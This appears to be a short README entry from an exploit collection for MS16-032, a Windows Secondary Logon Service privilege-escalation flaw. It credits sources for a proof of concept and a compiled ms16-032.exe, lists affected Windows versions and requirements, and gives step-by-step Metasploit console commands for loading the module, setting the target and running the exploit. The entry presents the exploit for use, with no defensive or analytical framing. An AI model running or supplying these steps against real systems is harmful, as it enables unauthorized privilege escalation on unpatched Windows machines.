- The POC of MS16-032 was from exp-db
- The exp(ms16-032.exe) was from @khr0x40sh
Vulnerability reference:
- Windows x86
- Windows x64
This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
msf > use exploit/windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc) > show targets
...targets...
msf exploit(ms16_032_secondary_logon_handle_privesc) > set TARGET <target-id>
msf exploit(ms16_032_secondary_logon_handle_privesc) > show options
...show and set options...
msf exploit(ms16_032_secondary_logon_handle_privesc) > exploit